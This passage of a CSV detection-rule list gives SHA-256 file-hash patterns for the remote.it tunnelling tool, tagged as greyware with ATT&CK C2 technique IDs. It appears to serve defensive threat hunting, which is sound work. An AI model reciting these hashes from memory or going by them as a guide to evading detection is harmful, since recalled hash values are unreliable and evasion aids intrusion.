TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*4988a9006fef04ca8ccba9ea08e63a8e960863a4106179c65d445cd71c3ea48a*",".{0,1000}4988a9006fef04ca8ccba9ea08e63a8e960863a4106179c65d445cd71c3ea48a.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*4bd934b1beb4ce52cad55ccdbb7528fe449e372125352f2ca4b6ce4cc7f489d6*",".{0,1000}4bd934b1beb4ce52cad55ccdbb7528fe449e372125352f2ca4b6ce4cc7f489d6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*4c67141acad76f0a686c78d5723be5d395b51ac6f323e2ca8788f4678c9df1aa*",".{0,1000}4c67141acad76f0a686c78d5723be5d395b51ac6f323e2ca8788f4678c9df1aa.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*4ceb965f166bdf4d8d16d081d24ad0488cbd67c955d9817b0832a0b70e38db3f*",".{0,1000}4ceb965f166bdf4d8d16d081d24ad0488cbd67c955d9817b0832a0b70e38db3f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*4dbcad57d73bd7245c37f330719add5e842b4c8dd7830039ce50ca2d615ffe16*",".{0,1000}4dbcad57d73bd7245c37f330719add5e842b4c8dd7830039ce50ca2d615ffe16.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*4e278396d6ca4d2eb560f7cac6c7aebc0d729ffa3af3423668b5f30275aa2b51*",".{0,1000}4e278396d6ca4d2eb560f7cac6c7aebc0d729ffa3af3423668b5f30275aa2b51.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*4e2acdb55e74ee0525f6614436674560388b36b8316552fdae32b44398e56ef2*",".{0,1000}4e2acdb55e74ee0525f6614436674560388b36b8316552fdae32b44398e56ef2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*4f29beec80237718a80f87d4afc2a8d79dd8e5b680b2490653a3cacc9856be83*",".{0,1000}4f29beec80237718a80f87d4afc2a8d79dd8e5b680b2490653a3cacc9856be83.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*508e9b2199a8c36668fe48520c2d2ba6ee30db5fca04c7ca3e7cd42e5ce20097*",".{0,1000}508e9b2199a8c36668fe48520c2d2ba6ee30db5fca04c7ca3e7cd42e5ce20097.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*50dae26eefa5516f7a4a02832fa065d971ca9feebbee519f2a2ab1bcb3dedd12*",".{0,1000}50dae26eefa5516f7a4a02832fa065d971ca9feebbee519f2a2ab1bcb3dedd12.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5170878a45097dd423d7ab4ec48724b4ef046ea5d990e763d18eee67af881e74*",".{0,1000}5170878a45097dd423d7ab4ec48724b4ef046ea5d990e763d18eee67af881e74.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*53ea72dc5887ad00512cccb7991fd7e7a3116390d87ddb45af322f50fee469a7*",".{0,1000}53ea72dc5887ad00512cccb7991fd7e7a3116390d87ddb45af322f50fee469a7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5469da4765d2a07fa3cb198ee9d2332862a9b270af4960e22d149cafd8f97c3f*",".{0,1000}5469da4765d2a07fa3cb198ee9d2332862a9b270af4960e22d149cafd8f97c3f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*54ba4f0b5b5211e027f2e97eca9b534a7e937b23e50f8db93ed573b2a3db9670*",".{0,1000}54ba4f0b5b5211e027f2e97eca9b534a7e937b23e50f8db93ed573b2a3db9670.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*565bb9fd10eabae3f557cd29ee48b29054f98aa3934c2c3c2a6e6e528d06b5fb*",".{0,1000}565bb9fd10eabae3f557cd29ee48b29054f98aa3934c2c3c2a6e6e528d06b5fb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*56c68e08402096d11585592005d9eae985cf0d248e2f8103da15ad351eafae58*",".{0,1000}56c68e08402096d11585592005d9eae985cf0d248e2f8103da15ad351eafae58.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*56ca2194c2c1dae9900e4d9e5def115af7c7f6376fffeaaef08e00ed95b81934*",".{0,1000}56ca2194c2c1dae9900e4d9e5def115af7c7f6376fffeaaef08e00ed95b81934.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*56ccaa3297c8004543544b5d56c801a9c7ac1e40bc8b9e7258634ef4dc95a44b*",".{0,1000}56ccaa3297c8004543544b5d56c801a9c7ac1e40bc8b9e7258634ef4dc95a44b.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*575fa9f32f88855c0e945bc076061933bbd0991f640b12da69e3a209b307decb*",".{0,1000}575fa9f32f88855c0e945bc076061933bbd0991f640b12da69e3a209b307decb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*57d460230411f7d23ab6cd3463c737c657c0225df3a1aac75e049ca9d66f5763*",".{0,1000}57d460230411f7d23ab6cd3463c737c657c0225df3a1aac75e049ca9d66f5763.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*59b97a0dd632d3cb6741d58d315bab9e1407bacd3c5129554cc3a61770ece321*",".{0,1000}59b97a0dd632d3cb6741d58d315bab9e1407bacd3c5129554cc3a61770ece321.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5a57e519ca408107e53cc361cc237e3e57929721bc3eabebc5ab5b1275adca6d*",".{0,1000}5a57e519ca408107e53cc361cc237e3e57929721bc3eabebc5ab5b1275adca6d.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*5aa6d23a262a238dbddddf45fa06d182673142a416002dc70e4c893f9aee723f*",".{0,1000}5aa6d23a262a238dbddddf45fa06d182673142a416002dc70e4c893f9aee723f.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5c0c101aa1f0e6a4ed5a67831b13a88ed9c678aaa8c2860dcdc191a8a073c153*",".{0,1000}5c0c101aa1f0e6a4ed5a67831b13a88ed9c678aaa8c2860dcdc191a8a073c153.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5d1cf73d662aa8ef604855576ba9fa9cec217c18b4afa0794ab659b386112030*",".{0,1000}5d1cf73d662aa8ef604855576ba9fa9cec217c18b4afa0794ab659b386112030.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5e793d7d56ba10e446a23ee4523ade87336e1eff95cdded4312800bf3997e548*",".{0,1000}5e793d7d56ba10e446a23ee4523ade87336e1eff95cdded4312800bf3997e548.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5e99f3186a99ec653ec3dcc9d6b4e3b1cfd5993ee0a33692bdf571e3e54309a2*",".{0,1000}5e99f3186a99ec653ec3dcc9d6b4e3b1cfd5993ee0a33692bdf571e3e54309a2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5f9ea43593ac996fc08651431bfbce6408c6dabd0ea01881c56ef6d083e8b0bc*",".{0,1000}5f9ea43593ac996fc08651431bfbce6408c6dabd0ea01881c56ef6d083e8b0bc.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*5fd16aba9217f23c9bf91eb92f870f9b368f2a0da3b2799a88ac63454f2a0559*",".{0,1000}5fd16aba9217f23c9bf91eb92f870f9b368f2a0da3b2799a88ac63454f2a0559.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*662aa3c30a3486158b79373f1ab537139a069778519e8e42455e846ff4bab1f8*",".{0,1000}662aa3c30a3486158b79373f1ab537139a069778519e8e42455e846ff4bab1f8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*693475b69741d88b18afca69ab81daa69d5b7fe8f5f6849f69676b62c3379af5*",".{0,1000}693475b69741d88b18afca69ab81daa69d5b7fe8f5f6849f69676b62c3379af5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*6a43c893da2a0f2fa6dcbec833f34290385c9ec44f06a358fadaad4677c9ae76*",".{0,1000}6a43c893da2a0f2fa6dcbec833f34290385c9ec44f06a358fadaad4677c9ae76.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*6d2e71d3158ce74d7cd53b333edc7389b02c9d473658b87d898a7a40e377850c*",".{0,1000}6d2e71d3158ce74d7cd53b333edc7389b02c9d473658b87d898a7a40e377850c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*6db1c295c1602011ddba8c5d3e43d8c73f247d1367fa2600062862004b1e88db*",".{0,1000}6db1c295c1602011ddba8c5d3e43d8c73f247d1367fa2600062862004b1e88db.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*6e469301d72958686bc78469c7c9d6a79fb848e77e6b00a037526d44f5d48819*",".{0,1000}6e469301d72958686bc78469c7c9d6a79fb848e77e6b00a037526d44f5d48819.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*6e8947870ecf553ed99f745eb8c66fd7daf3d60fb16f5ff44285c7c7f11137c0*",".{0,1000}6e8947870ecf553ed99f745eb8c66fd7daf3d60fb16f5ff44285c7c7f11137c0.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*6ef99a03b1df823546e414b4b3ce5ce0e43121db66b52c9e10b61ab653b46bf8*",".{0,1000}6ef99a03b1df823546e414b4b3ce5ce0e43121db66b52c9e10b61ab653b46bf8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*6fa10205d1ade554f1f0250db2752f855919abba4cf63efb907a7543efc1beae*",".{0,1000}6fa10205d1ade554f1f0250db2752f855919abba4cf63efb907a7543efc1beae.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*6ff59cb7898fc8534f0a799029d8cf5b9b033c1d19cba81a91b6cb05415d34c1*",".{0,1000}6ff59cb7898fc8534f0a799029d8cf5b9b033c1d19cba81a91b6cb05415d34c1.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*778dc2b522e8c8a828ac6de8c286f136bfff01ab570d90edc107ca21d68bfde2*",".{0,1000}778dc2b522e8c8a828ac6de8c286f136bfff01ab570d90edc107ca21d68bfde2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*79571f764640046994297e5c3123fc3c5243d5df378a16abbce7abc30ebec829*",".{0,1000}79571f764640046994297e5c3123fc3c5243d5df378a16abbce7abc30ebec829.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*796c8853196cd8a5b4aaed85718ff95c86006200fa5f579a9523f66421873004*",".{0,1000}796c8853196cd8a5b4aaed85718ff95c86006200fa5f579a9523f66421873004.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*796d3702d3376d0116192eef85fbb05e2f10531c57958489bbadb92372c120e6*",".{0,1000}796d3702d3376d0116192eef85fbb05e2f10531c57958489bbadb92372c120e6.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*7983d5af3fb00770345c09aca16a8d8ff122dbe81b58a0de69b571b55f4dae1e*",".{0,1000}7983d5af3fb00770345c09aca16a8d8ff122dbe81b58a0de69b571b55f4dae1e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*79f5c26bdac4bbebe20fad039b028776f064003690b4141e9db5fd01c3262901*",".{0,1000}79f5c26bdac4bbebe20fad039b028776f064003690b4141e9db5fd01c3262901.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*7b430460f7b6eee413a53e58f7ca7ff5c5f66c9e31fce4b2f02c9fe76f251301*",".{0,1000}7b430460f7b6eee413a53e58f7ca7ff5c5f66c9e31fce4b2f02c9fe76f251301.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*7c4914fb0be3e091e4c693c4c6c31824b75b270a97ead524a4795b6d32b6b6ce*",".{0,1000}7c4914fb0be3e091e4c693c4c6c31824b75b270a97ead524a4795b6d32b6b6ce.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*7c8a8e35b0104fe2fef94a7c7cff468bf7447b77b1018fc1d692da9d001fe3e4*",".{0,1000}7c8a8e35b0104fe2fef94a7c7cff468bf7447b77b1018fc1d692da9d001fe3e4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*7df5411490635c5c29704e2fec13133a27a4acaa35255cd22da16dda1b9f5f24*",".{0,1000}7df5411490635c5c29704e2fec13133a27a4acaa35255cd22da16dda1b9f5f24.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*7e735d5682bcc025c49cd916f004ae6649d736bae2e486098cd34c29e50c21cf*",".{0,1000}7e735d5682bcc025c49cd916f004ae6649d736bae2e486098cd34c29e50c21cf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*7f0125964d3060da6c75a5229f87c9be434abf3566c2fcd3c461868aa33199be*",".{0,1000}7f0125964d3060da6c75a5229f87c9be434abf3566c2fcd3c461868aa33199be.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*7f59d8d46332b5cd74fa92390567375011b6123e8ccc2a1b4f91fa17761cd617*",".{0,1000}7f59d8d46332b5cd74fa92390567375011b6123e8ccc2a1b4f91fa17761cd617.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*80fe638eebe79635247d036438363f307f96dc388ca50ac5d4456b121c40b702*",".{0,1000}80fe638eebe79635247d036438363f307f96dc388ca50ac5d4456b121c40b702.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*81265cdf4e2efcc4c9285c8d2a4cf2716f0108d861bbababd01cf4bce9b2486c*",".{0,1000}81265cdf4e2efcc4c9285c8d2a4cf2716f0108d861bbababd01cf4bce9b2486c.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*820b29ceaeed51da52cd45987f9a0ebcca4335aff654204393c0705e83324d50*",".{0,1000}820b29ceaeed51da52cd45987f9a0ebcca4335aff654204393c0705e83324d50.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*820d907e4d5c567988b402ab0e31414937fd187b273004a538880f20aaefaa21*",".{0,1000}820d907e4d5c567988b402ab0e31414937fd187b273004a538880f20aaefaa21.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*84b735e9c0af06be82353d3cfc511ffe8edcfc7e2952aceaec7221b282488d69*",".{0,1000}84b735e9c0af06be82353d3cfc511ffe8edcfc7e2952aceaec7221b282488d69.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*87c0e2e1aa8e9c492a4ae12219f7a14cae0724c57a127445f92513e4acc962b3*",".{0,1000}87c0e2e1aa8e9c492a4ae12219f7a14cae0724c57a127445f92513e4acc962b3.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*88489815bf08cd6b93b92f3c21c76926e08c1c4f3e31c2f4a303eaa3b58f6c91*",".{0,1000}88489815bf08cd6b93b92f3c21c76926e08c1c4f3e31c2f4a303eaa3b58f6c91.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8988af63d7f1d5a9f1ffaf6f24c487e8713df21faf0ae8fc7bfb7996583c02ad*",".{0,1000}8988af63d7f1d5a9f1ffaf6f24c487e8713df21faf0ae8fc7bfb7996583c02ad.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*89dd76ded9f76dc5e8590241d0564c26146f3716d814a5281d65a719d5dd66cf*",".{0,1000}89dd76ded9f76dc5e8590241d0564c26146f3716d814a5281d65a719d5dd66cf.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8a2ee3773f2b5a22f6f01569e9d17cd3e1eba7c2e215e043c014b4bc609e55ef*",".{0,1000}8a2ee3773f2b5a22f6f01569e9d17cd3e1eba7c2e215e043c014b4bc609e55ef.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*8b0da574d5be1c375f60b1f2e93a77ba8a1742df128a8557963757434e2375e2*",".{0,1000}8b0da574d5be1c375f60b1f2e93a77ba8a1742df128a8557963757434e2375e2.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
